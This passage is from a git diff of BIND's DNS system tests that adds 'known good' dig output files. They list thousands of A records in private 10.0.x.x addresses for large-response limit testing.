5M IN A 10.0.5.110 +2000.example. 5M IN A 10.0.5.111 +2000.example. 5M IN A 10.0.5.112 +2000.example. 5M IN A 10.0.5.113 +2000.example. 5M IN A 10.0.5.114 +2000.example. 5M IN A 10.0.5.115 +2000.example. 5M IN A 10.0.5.116 +2000.example. 5M IN A 10.0.5.117 +2000.example. 5M IN A 10.0.5.118 +2000.example. 5M IN A 10.0.5.119 +2000.example. 5M IN A 10.0.5.120 +2000.example. 5M IN A 10.0.5.121 +2000.example. 5M IN A 10.0.5.122 +2000.example. 5M IN A 10.0.5.123 +2000.example. 5M IN A 10.0.5.124 +2000.example. 
5M IN A 10.0.5.125 +2000.example. 5M IN A 10.0.5.126 +2000.example. 5M IN A 10.0.5.127 +2000.example. 5M IN A 10.0.5.128 +2000.example. 5M IN A 10.0.5.129 +2000.example. 5M IN A 10.0.5.130 +2000.example. 5M IN A 10.0.5.131 +2000.example. 5M IN A 10.0.5.132 +2000.example. 5M IN A 10.0.5.133 +2000.example. 5M IN A 10.0.5.134 +2000.example. 5M IN A 10.0.5.135 +2000.example. 5M IN A 10.0.5.136 +2000.example. 5M IN A 10.0.5.137 +2000.example. 5M IN A 10.0.5.138 +2000.example. 5M IN A 10.0.5.139 +2000.example. 5M IN A 10.0.5.140 +2000.example. 5M IN A 10.0.5.141 +2000.example. 5M IN A 10.0.5.142 +2000.example. 5M IN A 10.0.5.143 +2000.example. 5M IN A 10.0.5.144 +2000.example. 5M IN A 10.0.5.145 +2000.example. 5M IN A 10.0.5.146 +2000.example. 5M IN A 10.0.5.147 +2000.example. 5M IN A 10.0.5.148 +2000.example. 5M IN A 10.0.5.149 +2000.example. 5M IN A 10.0.5.150 +2000.example. 5M IN A 10.0.5.151 +2000.example. 5M IN A 10.0.5.152 +2000.example. 5M IN A 10.0.5.153 +2000.example. 5M IN A 10.0.5.154 +2000.example. 5M IN A 10.0.5.155 +2000.example. 5M IN A 10.0.5.156 +2000.example. 5M IN A 10.0.5.157 +2000.example. 5M IN A 10.0.5.158 +2000.example. 5M IN A 10.0.5.159 +2000.example. 5M IN A 10.0.5.160 +2000.example. 5M IN A 10.0.5.161 +2000.example. 5M IN A 10.0.5.162 +2000.example. 5M IN A 10.0.5.163 +2000.example. 5M IN A 10.0.5.164 +2000.example. 5M IN A 10.0.5.165 +2000.example. 5M IN A 10.0.5.166 +2000.example. 5M IN A 10.0.5.167 +2000.example. 5M IN A 10.0.5.168 +2000.example. 5M IN A 10.0.5.169 +2000.example. 5M IN A 10.0.5.170 +2000.example. 5M IN A 10.0.5.171 +2000.example. 5M IN A 10.0.5.172 +2000.example. 5M IN A 10.0.5.173 +2000.example. 5M IN A 10.0.5.174 +2000.example. 5M IN A 10.0.5.175 +2000.example. 5M IN A 10.0.5.176 +2000.example. 5M IN A 10.0.5.177 +2000.example. 5M IN A 10.0.5.178 +2000.example. 5M IN A 10.0.5.179 +2000.example. 5M IN A 10.0.5.180 +2000.example. 5M IN A 10.0.5.181 +2000.example. 5M IN A 10.0.5.182 +2000.example. 
5M IN A 10.0.5.183 +2000.example. 5M IN A 10.0.5.184 +2000.example. 5M IN A 10.0.5.185 +2000.example. 5M IN A 10.0.5.186 +2000.example. 5M IN A 10.0.5.187 +2000.example. 5M IN A 10.0.5.188 +2000.example. 5M IN A 10.0.5.189 +2000.example. 5M IN A 10.0.5.190 +2000.example. 5M IN A 10.0.5.191 +2000.example. 5M IN A 10.0.5.192 +2000.example. 5M IN A 10.0.5.193 +2000.example. 5M IN A 10.0.5.194 +2000.example. 5M IN A 10.0.5.195 +2000.example. 5M IN A 10.0.5.196 +2000.example. 5M IN A 10.0.5.197 +2000.example. 5M IN A 10.0.5.198 +2000.example. 5M IN A 10.0.5.199 +2000.example. 5M IN A 10.0.5.200 +2000.example. 5M IN A 10.0.5.201 +2000.example. 5M IN A 10.0.5.202 +2000.example. 5M IN A 10.0.5.203 +2000.example. 5M IN A 10.0.5.204 +2000.example. 5M IN A 10.0.5.205 +2000.example. 5M IN A 10.0.5.206 +2000.example. 5M IN A 10.0.5.207 +2000.example. 5M IN A 10.0.5.208 +2000.example. 5M IN A 10.0.5.209 +2000.example. 5M IN A 10.0.5.210 +2000.example. 5M IN A 10.0.5.211 +2000.example. 5M IN A 10.0.5.212 +2000.example. 5M IN A 10.0.5.213 +2000.example. 5M IN A 10.0.5.214 +2000.example. 5M IN A 10.0.5.215 +2000.example. 5M IN A 10.0.5.216 +2000.example. 5M IN A 10.0.5.217 +2000.example. 5M IN A 10.0.5.218 +2000.example. 5M IN A 10.0.5.219 +2000.example. 5M IN A 10.0.5.220 +2000.example. 5M IN A 10.0.5.221 +2000.example. 5M IN A 10.0.5.222 +2000.example. 5M IN A 10.0.5.223 +2000.example. 5M IN A 10.0.5.224 +2000.example. 5M IN A 10.0.5.225 +2000.example. 5M IN A 10.0.5.226 +2000.example. 5M IN A 10.0.5.227 +2000.example. 5M IN A 10.0.5.228 +2000.example. 5M IN A 10.0.5.229 +2000.example. 5M IN A 10.0.5.230 +2000.example. 5M IN A 10.0.5.231 +2000.example. 5M IN A 10.0.5.232 +2000.example. 5M IN A 10.0.5.233 +2000.example. 5M IN A 10.0.5.234 +2000.example. 5M IN A 10.0.5.235 +2000.example. 5M IN A 10.0.5.236 +2000.example. 5M IN A 10.0.5.237 +2000.example. 5M IN A 10.0.5.238 +2000.example. 5M IN A 10.0.5.239 +2000.example. 5M IN A 10.0.5.240 +2000.example. 
5M IN A 10.0.5.241 +2000.example. 5M IN A 10.0.5.242 +2000.example. 5M IN A 10.0.5.243 +2000.example. 5M IN A 10.0.5.244 +2000.example. 5M IN A 10.0.5.245 +2000.example. 5M IN A 10.0.5.246 +2000.example. 5M IN A 10.0.5.247 +2000.example. 5M IN A 10.0.5.248 +2000.example. 5M IN A 10.0.5.249 +2000.example. 5M IN A 10.0.5.250 +2000.example. 5M IN A 10.0.5.251 +2000.example. 5M IN A 10.0.5.252 +2000.example. 5M IN A 10.0.5.253 +2000.example. 5M IN A 10.0.5.254 +2000.example. 5M IN A 10.0.5.255 +2000.example. 5M IN A 10.0.6.0 +2000.example. 5M IN A 10.0.6.1 +2000.example. 5M IN A 10.0.6.2 +2000.example. 5M IN A 10.0.6.3 +2000.example. 5M IN A 10.0.6.4 +2000.example. 5M IN A 10.0.6.5 +2000.example. 5M IN A 10.0.6.6 +2000.example. 5M IN A 10.0.6.7 +2000.example. 5M IN A 10.0.6.8 +2000.example. 5M IN A 10.0.6.9 +2000.example. 5M IN A 10.0.6.10 +2000.example. 5M IN A 10.0.6.11 +2000.example. 5M IN A 10.0.6.12 +2000.example. 5M IN A 10.0.6.13 +2000.example. 5M IN A 10.0.6.14 +2000.example. 5M IN A 10.0.6.15 +2000.example. 5M IN A 10.0.6.16 +2000.example. 5M IN A 10.0.6.17 +2000.example. 5M IN A 10.0.6.18 +2000.example. 5M IN A 10.0.6.19 +2000.example. 5M IN A 10.0.6.20 +2000.example. 5M IN A 10.0.6.21 +2000.example. 5M IN A 10.0.6.22 +2000.example. 5M IN A 10.0.6.23 +2000.example. 5M IN A 10.0.6.24 +2000.example. 5M IN A 10.0.6.25 +2000.example. 5M IN A 10.0.6.26 +2000.example. 5M IN A 10.0.6.27 +2000.example. 5M IN A 10.0.6.28 +2000.example. 5M IN A 10.0.6.29 +2000.example. 5M IN A 10.0.6.30 +2000.example. 5M IN A 10.0.6.31 +2000.example. 5M IN A 10.0.6.32 +2000.example. 5M IN A 10.0.6.33 +2000.example. 5M IN A 10.0.6.34 +2000.example. 5M IN A 10.0.6.35 +2000.example. 5M IN A 10.0.6.36 +2000.example. 5M IN A 10.0.6.37 +2000.example. 5M IN A 10.0.6.38 +2000.example. 5M IN A 10.0.6.39 +2000.example. 5M IN A 10.0.6.40 +2000.example. 5M IN A 10.0.6.41 +2000.example. 5M IN A 10.0.6.42 +2000.example. 5M IN A 10.0.6.43 +2000.example. 5M IN A 10.0.6.44 +2000.example. 
5M IN A 10.0.6.45 +2000.example. 5M IN A 10.0.6.46 +2000.example. 5M IN A 10.0.6.47 +2000.example. 5M IN A 10.0.6.48 +2000.example. 5M IN A 10.0.6.49 +2000.example. 5M IN A 10.0.6.50 +2000.example. 5M IN A 10.0.6.51 +2000.example. 5M IN A 10.0.6.52 +2000.example. 5M IN A 10.0.6.53 +2000.example. 5M IN A 10.0.6.54 +2000.example. 5M IN A 10.0.6.55 +2000.example. 5M IN A 10.0.6.56 +2000.example. 5M IN A 10.0.6.57 +2000.example. 5M IN A 10.0.6.58 +2000.example. 5M IN A 10.0.6.59 +2000.example. 5M IN A 10.0.6.60 +2000.example. 5M IN A 10.0.6.61 +2000.example. 5M IN A 10.0.6.62 +2000.example. 5M IN A 10.0.6.63 +2000.example. 5M IN A 10.0.6.64 +2000.example. 5M IN A 10.0.6.65 +2000.example. 5M IN A 10.0.6.66 +2000.example. 5M IN A 10.0.6.67 +2000.example. 5M IN A 10.0.6.68 +2000.example. 5M IN A 10.0.6.69 +2000.example. 5M IN A 10.0.6.70 +2000.example. 5M IN A 10.0.6.71 +2000.example. 5M IN A 10.0.6.72 +2000.example. 5M IN A 10.0.6.73 +2000.example. 5M IN A 10.0.6.74 +2000.example. 5M IN A 10.0.6.75 +2000.example. 5M IN A 10.0.6.76 +2000.example. 5M IN A 10.0.6.77 +2000.example. 5M IN A 10.0.6.78 +2000.example. 5M IN A 10.0.6.79 +2000.example. 5M IN A 10.0.6.80 +2000.example. 5M IN A 10.0.6.81 +2000.example. 5M IN A 10.0.6.82 +2000.example. 5M IN A 10.0.6.83 +2000.example. 5M IN A 10.0.6.84 +2000.example. 5M IN A 10.0.6.85 +2000.example. 5M IN A 10.0.6.86 +2000.example. 5M IN A 10.0.6.87 +2000.example. 5M IN A 10.0.6.88 +2000.example. 5M IN A 10.0.6.89 +2000.example. 5M IN A 10.0.6.90 +2000.example. 5M IN A 10.0.6.91 +2000.example. 5M IN A 10.0.6.92 +2000.example. 5M IN A 10.0.6.93 +2000.example. 5M IN A 10.0.6.94 +2000.example. 5M IN A 10.0.6.95 +2000.example. 5M IN A 10.0.6.96 +2000.example. 5M IN A 10.0.6.97 +2000.example. 5M IN A 10.0.6.98 +2000.example. 5M IN A 10.0.6.99 +2000.example. 5M IN A 10.0.6.100 +2000.example. 5M IN A 10.0.6.101 +2000.example. 5M IN A 10.0.6.102 +2000.example. 5M IN A 10.0.6.103 +2000.example. 5M IN A 10.0.6.104 +2000.example. 
5M IN A 10.0.6.105 +2000.example. 5M IN A 10.0.6.106 +2000.example. 5M IN A 10.0.6.107 +2000.example. 5M IN A 10.0.6.108 +2000.example. 5M IN A 10.0.6.109 +2000.example. 5M IN A 10.0.6.110 +2000.example. 5M IN A 10.0.6.111 +2000.example. 5M IN A 10.0.6.112 +2000.example. 5M IN A 10.0.6.113 +2000.example. 5M IN A 10.0.6.114 +2000.example. 5M IN A 10.0.6.115 +2000.example. 5M IN A 10.0.6.116 +2000.example. 5M IN A 10.0.6.117 +2000.example. 5M IN A 10.0.6.118 +2000.example. 5M IN A 10.0.6.119 +2000.example. 5M IN A 10.0.6.120 +2000.example. 5M IN A 10.0.6.121 +2000.example. 5M IN A 10.0.6.122 +2000.example. 5M IN A 10.0.6.123 +2000.example. 5M IN A 10.0.6.124 +2000.example. 5M IN A 10.0.6.125 +2000.example. 5M IN A 10.0.6.126 +2000.example. 5M IN A 10.0.6.127 +2000.example. 5M IN A 10.0.6.128 +2000.example. 5M IN A 10.0.6.129 +2000.example. 5M IN A 10.0.6.130 +2000.example. 5M IN A 10.0.6.131 +2000.example. 5M IN A 10.0.6.132 +2000.example. 5M IN A 10.0.6.133 +2000.example. 5M IN A 10.0.6.134 +2000.example. 5M IN A 10.0.6.135 +2000.example. 5M IN A 10.0.6.136 +2000.example. 5M IN A 10.0.6.137 +2000.example. 5M IN A 10.0.6.138 +2000.example. 5M IN A 10.0.6.139 +2000.example. 5M IN A 10.0.6.140 +2000.example. 5M IN A 10.0.6.141 +2000.example. 5M IN A 10.0.6.142 +2000.example. 5M IN A 10.0.6.143 +2000.example. 5M IN A 10.0.6.144 +2000.example. 5M IN A 10.0.6.145 +2000.example. 5M IN A 10.0.6.146 +2000.example. 5M IN A 10.0.6.147 +2000.example. 5M IN A 10.0.6.148 +2000.example. 5M IN A 10.0.6.149 +2000.example. 5M IN A 10.0.6.150 +2000.example. 5M IN A 10.0.6.151 +2000.example. 5M IN A 10.0.6.152 +2000.example. 5M IN A 10.0.6.153 +2000.example. 5M IN A 10.0.6.154 +2000.example. 5M IN A 10.0.6.155 +2000.example. 5M IN A 10.0.6.156 +2000.example. 5M IN A 10.0.6.157 +2000.example. 5M IN A 10.0.6.158 +2000.example. 5M IN A 10.0.6.159 +2000.example. 5M IN A 10.0.6.160 +2000.example. 5M IN A 10.0.6.161 +2000.example. 5M IN A 10.0.6.162 +2000.example. 
5M IN A 10.0.6.163 +2000.example. 5M IN A 10.0.6.164 +2000.example. 5M IN A 10.0.6.165 +2000.example. 5M IN A 10.0.6.166 +2000.example. 5M IN A 10.0.6.167 +2000.example. 5M IN A 10.0.6.168 +2000.example. 5M IN A 10.0.6.169 +2000.example. 5M IN A 10.0.6.170 +2000.example. 5M IN A 10.0.6.171 +2000.example. 5M IN A 10.0.6.172 +2000.example. 5M IN A 10.0.6.173 +2000.example. 5M IN A 10.0.6.174 +2000.example. 5M IN A 10.0.6.175 +2000.example. 5M IN A 10.0.6.176 +2000.example. 5M IN A 10.0.6.177 +2000.example. 5M IN A 10.0.6.178 +2000.example. 5M IN A 10.0.6.179 +2000.example. 5M IN A 10.0.6.180 +2000.example. 5M IN A 10.0.6.181 +2000.example. 5M IN A 10.0.6.182 +2000.example. 5M IN A 10.0.6.183 +2000.example. 5M IN A 10.0.6.184 +2000.example. 5M IN A 10.0.6.185 +2000.example. 5M IN A 10.0.6.186 +2000.example. 5M IN A 10.0.6.187 +2000.example. 5M IN A 10.0.6.188 +2000.example. 5M IN A 10.0.6.189 +2000.example. 5M IN A 10.0.6.190 +2000.example. 5M IN A 10.0.6.191 +2000.example. 5M IN A 10.0.6.192 +2000.example. 5M IN A 10.0.6.193 +2000.example. 5M IN A 10.0.6.194 +2000.example. 5M IN A 10.0.6.195 +2000.example. 5M IN A 10.0.6.196 +2000.example. 5M IN A 10.0.6.197 +2000.example. 5M IN A 10.0.6.198 +2000.example. 5M IN A 10.0.6.199 +2000.example. 5M IN A 10.0.6.200 +2000.example. 5M IN A 10.0.6.201 +2000.example. 5M IN A 10.0.6.202 +2000.example. 5M IN A 10.0.6.203 +2000.example. 5M IN A 10.0.6.204 +2000.example. 5M IN A 10.0.6.205 +2000.example. 5M IN A 10.0.6.206 +2000.example. 5M IN A 10.0.6.207 +2000.example. 5M IN A 10.0.6.208 +2000.example. 5M IN A 10.0.6.209 +2000.example. 5M IN A 10.0.6.210 +2000.example. 5M IN A 10.0.6.211 +2000.example. 5M IN A 10.0.6.212 +2000.example. 5M IN A 10.0.6.213 +2000.example. 5M IN A 10.0.6.214 +2000.example. 5M IN A 10.0.6.215 +2000.example. 5M IN A 10.0.6.216 +2000.example. 5M IN A 10.0.6.217 +2000.example. 5M IN A 10.0.6.218 +2000.example. 5M IN A 10.0.6.219 +2000.example. 5M IN A 10.0.6.220 +2000.example. 
5M IN A 10.0.6.221 +2000.example. 5M IN A 10.0.6.222 +2000.example. 5M IN A 10.0.6.223 +2000.example. 5M IN A 10.0.6.224 +2000.example. 5M IN A 10.0.6.225 +2000.example. 5M IN A 10.0.6.226 +2000.example. 5M IN A 10.0.6.227 +2000.example. 5M IN A 10.0.6.228 +2000.example. 5M IN A 10.0.6.229 +2000.example. 5M IN A 10.0.6.230 +2000.example. 5M IN A 10.0.6.231 +2000.example. 5M IN A 10.0.6.232 +2000.example. 5M IN A 10.0.6.233 +2000.example. 5M IN A 10.0.6.234 +2000.example. 5M IN A 10.0.6.235 +2000.example. 5M IN A 10.0.6.236 +2000.example. 5M IN A 10.0.6.237 +2000.example. 5M IN A 10.0.6.238 +2000.example. 5M IN A 10.0.6.239 +2000.example. 5M IN A 10.0.6.240 +2000.example. 5M IN A 10.0.6.241 +2000.example. 5M IN A 10.0.6.242 +2000.example. 5M IN A 10.0.6.243 +2000.example. 5M IN A 10.0.6.244 +2000.example. 5M IN A 10.0.6.245 +2000.example. 5M IN A 10.0.6.246 +2000.example. 5M IN A 10.0.6.247 +2000.example. 5M IN A 10.0.6.248 +2000.example. 5M IN A 10.0.6.249 +2000.example. 5M IN A 10.0.6.250 +2000.example. 5M IN A 10.0.6.251 +2000.example. 5M IN A 10.0.6.252 +2000.example. 5M IN A 10.0.6.253 +2000.example. 5M IN A 10.0.6.254 +2000.example. 5M IN A 10.0.6.255 +2000.example. 5M IN A 10.0.7.0 +2000.example. 5M IN A 10.0.7.1 +2000.example. 5M IN A 10.0.7.2 +2000.example. 5M IN A 10.0.7.3 +2000.example. 5M IN A 10.0.7.4 +2000.example. 5M IN A 10.0.7.5 +2000.example. 5M IN A 10.0.7.6 +2000.example. 5M IN A 10.0.7.7 +2000.example. 5M IN A 10.0.7.8 +2000.example. 5M IN A 10.0.7.9 +2000.example. 5M IN A 10.0.7.10 +2000.example. 5M IN A 10.0.7.11 +2000.example. 5M IN A 10.0.7.12 +2000.example. 5M IN A 10.0.7.13 +2000.example. 5M IN A 10.0.7.14 +2000.example. 5M IN A 10.0.7.15 +2000.example. 5M IN A 10.0.7.16 +2000.example. 5M IN A 10.0.7.17 +2000.example. 5M IN A 10.0.7.18 +2000.example. 5M IN A 10.0.7.19 +2000.example. 5M IN A 10.0.7.20 +2000.example. 5M IN A 10.0.7.21 +2000.example. 5M IN A 10.0.7.22 +2000.example. 5M IN A 10.0.7.23 +2000.example. 
5M IN A 10.0.7.24 +2000.example. 5M IN A 10.0.7.25 +2000.example. 5M IN A 10.0.7.26 +2000.example. 5M IN A 10.0.7.27 +2000.example. 5M IN A 10.0.7.28 +2000.example. 5M IN A 10.0.7.29 +2000.example. 5M IN A 10.0.7.30 +2000.example. 5M IN A 10.0.7.31 +2000.example. 5M IN A 10.0.7.32 +2000.example. 5M IN A 10.0.7.33 +2000.example. 5M IN A 10.0.7.34 +2000.example. 5M IN A 10.0.7.35 +2000.example. 5M IN A 10.0.7.36 +2000.example. 5M IN A 10.0.7.37 +2000.example. 5M IN A 10.0.7.38 +2000.example. 5M IN A 10.0.7.39 +2000.example. 5M IN A 10.0.7.40 +2000.example. 5M IN A 10.0.7.41 +2000.example. 5M IN A 10.0.7.42 +2000.example. 5M IN A 10.0.7.43 +2000.example. 5M IN A 10.0.7.44 +2000.example. 5M IN A 10.0.7.45 +2000.example. 5M IN A 10.0.7.46 +2000.example. 5M IN A 10.0.7.47 +2000.example. 5M IN A 10.0.7.48 +2000.example. 5M IN A 10.0.7.49 +2000.example. 5M IN A 10.0.7.50 +2000.example. 5M IN A 10.0.7.51 +2000.example. 5M IN A 10.0.7.52 +2000.example. 5M IN A 10.0.7.53 +2000.example. 5M IN A 10.0.7.54 +2000.example. 5M IN A 10.0.7.55 +2000.example. 5M IN A 10.0.7.56 +2000.example. 5M IN A 10.0.7.57 +2000.example. 5M IN A 10.0.7.58 +2000.example. 5M IN A 10.0.7.59 +2000.example. 5M IN A 10.0.7.60 +2000.example. 5M IN A 10.0.7.61 +2000.example. 5M IN A 10.0.7.62 +2000.example. 5M IN A 10.0.7.63 +2000.example. 5M IN A 10.0.7.64 +2000.example. 5M IN A 10.0.7.65 +2000.example. 5M IN A 10.0.7.66 +2000.example. 5M IN A 10.0.7.67 +2000.example. 5M IN A 10.0.7.68 +2000.example. 5M IN A 10.0.7.69 +2000.example. 5M IN A 10.0.7.70 +2000.example. 5M IN A 10.0.7.71 +2000.example. 5M IN A 10.0.7.72 +2000.example. 5M IN A 10.0.7.73 +2000.example. 5M IN A 10.0.7.74 +2000.example. 5M IN A 10.0.7.75 +2000.example. 5M IN A 10.0.7.76 +2000.example. 5M IN A 10.0.7.77 +2000.example. 5M IN A 10.0.7.78 +2000.example. 5M IN A 10.0.7.79 +2000.example. 5M IN A 10.0.7.80 +2000.example. 5M IN A 10.0.7.81 +2000.example. 5M IN A 10.0.7.82 +2000.example. 5M IN A 10.0.7.83 +2000.example. 
5M IN A 10.0.7.84 +2000.example. 5M IN A 10.0.7.85 +2000.example. 5M IN A 10.0.7.86 +2000.example. 5M IN A 10.0.7.87 +2000.example. 5M IN A 10.0.7.88 +2000.example. 5M IN A 10.0.7.89 +2000.example. 5M IN A 10.0.7.90 +2000.example. 5M IN A 10.0.7.91 +2000.example. 5M IN A 10.0.7.92 +2000.example. 5M IN A 10.0.7.93 +2000.example. 5M IN A 10.0.7.94 +2000.example. 5M IN A 10.0.7.95 +2000.example. 5M IN A 10.0.7.96 +2000.example. 5M IN A 10.0.7.97 +2000.example. 5M IN A 10.0.7.98 +2000.example. 5M IN A 10.0.7.99 +2000.example. 5M IN A 10.0.7.100 +2000.example. 5M IN A 10.0.7.101 +2000.example. 5M IN A 10.0.7.102 +2000.example. 5M IN A 10.0.7.103 +2000.example. 5M IN A 10.0.7.104 +2000.example. 5M IN A 10.0.7.105 +2000.example. 5M IN A 10.0.7.106 +2000.example. 5M IN A 10.0.7.107 +2000.example. 5M IN A 10.0.7.108 +2000.example. 5M IN A 10.0.7.109 +2000.example. 5M IN A 10.0.7.110 +2000.example. 5M IN A 10.0.7.111 +2000.example. 5M IN A 10.0.7.112 +2000.example. 5M IN A 10.0.7.113 +2000.example. 5M IN A 10.0.7.114 +2000.example. 5M IN A 10.0.7.115 +2000.example. 5M IN A 10.0.7.116 +2000.example. 5M IN A 10.0.7.117 +2000.example. 5M IN A 10.0.7.118 +2000.example. 5M IN A 10.0.7.119 +2000.example. 5M IN A 10.0.7.120 +2000.example. 5M IN A 10.0.7.121 +2000.example. 5M IN A 10.0.7.122 +2000.example. 5M IN A 10.0.7.123 +2000.example. 5M IN A 10.0.7.124 +2000.example. 5M IN A 10.0.7.125 +2000.example. 5M IN A 10.0.7.126 +2000.example. 5M IN A 10.0.7.127 +2000.example. 5M IN A 10.0.7.128 +2000.example. 5M IN A 10.0.7.129 +2000.example. 5M IN A 10.0.7.130 +2000.example. 5M IN A 10.0.7.131 +2000.example. 5M IN A 10.0.7.132 +2000.example. 5M IN A 10.0.7.133 +2000.example. 5M IN A 10.0.7.134 +2000.example. 5M IN A 10.0.7.135 +2000.example. 5M IN A 10.0.7.136 +2000.example. 5M IN A 10.0.7.137 +2000.example. 5M IN A 10.0.7.138 +2000.example. 5M IN A 10.0.7.139 +2000.example. 5M IN A 10.0.7.140 +2000.example. 5M IN A 10.0.7.141 +2000.example. 5M IN A 10.0.7.142 +2000.example. 
5M IN A 10.0.7.143 +2000.example. 5M IN A 10.0.7.144 +2000.example. 5M IN A 10.0.7.145 +2000.example. 5M IN A 10.0.7.146 +2000.example. 5M IN A 10.0.7.147 +2000.example. 5M IN A 10.0.7.148 +2000.example. 5M IN A 10.0.7.149 +2000.example. 5M IN A 10.0.7.150 +2000.example. 5M IN A 10.0.7.151 +2000.example. 5M IN A 10.0.7.152 +2000.example. 5M IN A 10.0.7.153 +2000.example. 5M IN A 10.0.7.154 +2000.example. 5M IN A 10.0.7.155 +2000.example. 5M IN A 10.0.7.156 +2000.example. 5M IN A 10.0.7.157 +2000.example. 5M IN A 10.0.7.158 +2000.example. 5M IN A 10.0.7.159 +2000.example. 5M IN A 10.0.7.160 +2000.example. 5M IN A 10.0.7.161 +2000.example. 5M IN A 10.0.7.162 +2000.example. 5M IN A 10.0.7.163 +2000.example. 5M IN A 10.0.7.164 +2000.example. 5M IN A 10.0.7.165 +2000.example. 5M IN A 10.0.7.166 +2000.example. 5M IN A 10.0.7.167 +2000.example. 5M IN A 10.0.7.168 +2000.example. 5M IN A 10.0.7.169 +2000.example. 5M IN A 10.0.7.170 +2000.example. 5M IN A 10.0.7.171 +2000.example. 5M IN A 10.0.7.172 +2000.example. 5M IN A 10.0.7.173 +2000.example. 5M IN A 10.0.7.174 +2000.example. 5M IN A 10.0.7.175 +2000.example. 5M IN A 10.0.7.176 +2000.example. 5M IN A 10.0.7.177 +2000.example. 5M IN A 10.0.7.178 +2000.example. 5M IN A 10.0.7.179 +2000.example. 5M IN A 10.0.7.180 +2000.example. 5M IN A 10.0.7.181 +2000.example. 5M IN A 10.0.7.182 +2000.example. 5M IN A 10.0.7.183 +2000.example. 5M IN A 10.0.7.184 +2000.example. 5M IN A 10.0.7.185 +2000.example. 5M IN A 10.0.7.186 +2000.example. 5M IN A 10.0.7.187 +2000.example. 5M IN A 10.0.7.188 +2000.example. 5M IN A 10.0.7.189 +2000.example. 5M IN A 10.0.7.190 +2000.example. 5M IN A 10.0.7.191 +2000.example. 5M IN A 10.0.7.192 +2000.example. 5M IN A 10.0.7.193 +2000.example. 5M IN A 10.0.7.194 +2000.example. 5M IN A 10.0.7.195 +2000.example. 5M IN A 10.0.7.196 +2000.example. 5M IN A 10.0.7.197 +2000.example. 5M IN A 10.0.7.198 +2000.example. 5M IN A 10.0.7.199 +2000.example. 5M IN A 10.0.7.200 +2000.example. 
5M IN A 10.0.7.201 +2000.example. 5M IN A 10.0.7.202 +2000.example. 5M IN A 10.0.7.203 +2000.example. 5M IN A 10.0.7.204 +2000.example. 5M IN A 10.0.7.205 +2000.example. 5M IN A 10.0.7.206 +2000.example. 5M IN A 10.0.7.207 + +;; AUTHORITY SECTION: +example. 5M IN NS ns1.example. + +;; ADDITIONAL SECTION: +ns1.example. 5M IN A 10.53.0.1 + +;; Total query time: 121 msec +;; FROM: draco to SERVER: 10.53.0.1 +;; WHEN: Fri Jun 23 12:58:14 2000 +;; MSG SIZE sent: 30 rcvd: 32068 + diff --git a/bin/tests/system/limits/knowngood.dig.out.3000 b/bin/tests/system/limits/knowngood.dig.out.3000 new file mode 100644 index 0000000..1932475 --- /dev/null +++ b/bin/tests/system/limits/knowngood.dig.out.3000 
@@ -0,0 +1,3023 @@ + +; <<>> DiG 8.2 <<>> 3000.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 3000, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; 3000.example, type = A, class = IN + +;; ANSWER SECTION: +3000.example. 5M IN A 10.0.0.0 +3000.example. 5M IN A 10.0.0.1 +3000.example. 5M IN A 10.0.0.2 +3000.example. 5M IN A 10.0.0.3 +3000.example. 5M IN A 10.0.0.4 +3000.example. 5M IN A 10.0.0.5 +3000.example. 5M IN A 10.0.0.6 +3000.example. 5M IN A 10.0.0.7 +3000.example. 5M IN A 10.0.0.8 +3000.example. 5M IN A 10.0.0.9 +3000.example. 5M IN A 10.0.0.10 +3000.example. 5M IN A 10.0.0.11 +3000.example. 5M IN A 10.0.0.12 +3000.example. 5M IN A 10.0.0.13 +3000.example. 5M IN A 10.0.0.14 +3000.example. 5M IN A 10.0.0.15 +3000.example. 5M IN A 10.0.0.16 +3000.example. 5M IN A 10.0.0.17 +3000.example. 5M IN A 10.0.0.18 +3000.example. 5M IN A 10.0.0.19 +3000.example. 5M IN A 10.0.0.20 +3000.example. 5M IN A 10.0.0.21 +3000.example. 5M IN A 10.0.0.22 +3000.example. 5M IN A 10.0.0.23 +3000.example. 5M IN A 10.0.0.24 +3000.example. 5M IN A 10.0.0.25 +3000.example. 5M IN A 10.0.0.26 +3000.example. 5M IN A 10.0.0.27 +3000.example. 5M IN A 10.0.0.28 +3000.example. 5M IN A 10.0.0.29 +3000.example. 5M IN A 10.0.0.30 +3000.example. 5M IN A 10.0.0.31 +3000.example. 5M IN A 10.0.0.32 +3000.example. 5M IN A 10.0.0.33 +3000.example. 5M IN A 10.0.0.34 +3000.example. 5M IN A 10.0.0.35 +3000.example. 5M IN A 10.0.0.36 +3000.example. 5M IN A 10.0.0.37 +3000.example. 5M IN A 10.0.0.38 +3000.example. 5M IN A 10.0.0.39 +3000.example. 5M IN A 10.0.0.40 +3000.example. 5M IN A 10.0.0.41 +3000.example. 5M IN A 10.0.0.42 +3000.example. 5M IN A 10.0.0.43 +3000.example. 5M IN A 10.0.0.44 +3000.example. 5M IN A 10.0.0.45 +3000.example. 5M IN A 10.0.0.46 +3000.example. 5M IN A 10.0.0.47 +3000.example. 5M IN A 10.0.0.48 +3000.example. 
5M IN A 10.0.0.49 +3000.example. 5M IN A 10.0.0.50 +3000.example. 5M IN A 10.0.0.51 +3000.example. 5M IN A 10.0.0.52 +3000.example. 5M IN A 10.0.0.53 +3000.example. 5M IN A 10.0.0.54 +3000.example. 5M IN A 10.0.0.55 +3000.example. 5M IN A 10.0.0.56 +3000.example. 5M IN A 10.0.0.57 +3000.example. 5M IN A 10.0.0.58 +3000.example. 5M IN A 10.0.0.59 +3000.example. 5M IN A 10.0.0.60 +3000.example. 5M IN A 10.0.0.61 +3000.example. 5M IN A 10.0.0.62 +3000.example. 5M IN A 10.0.0.63 +3000.example. 5M IN A 10.0.0.64 +3000.example. 5M IN A 10.0.0.65 +3000.example. 5M IN A 10.0.0.66 +3000.example. 5M IN A 10.0.0.67 +3000.example. 5M IN A 10.0.0.68 +3000.example. 5M IN A 10.0.0.69 +3000.example. 5M IN A 10.0.0.70 +3000.example. 5M IN A 10.0.0.71 +3000.example. 5M IN A 10.0.0.72 +3000.example. 5M IN A 10.0.0.73 +3000.example. 5M IN A 10.0.0.74 +3000.example. 5M IN A 10.0.0.75 +3000.example. 5M IN A 10.0.0.76 +3000.example. 5M IN A 10.0.0.77 +3000.example. 5M IN A 10.0.0.78 +3000.example. 5M IN A 10.0.0.79 +3000.example. 5M IN 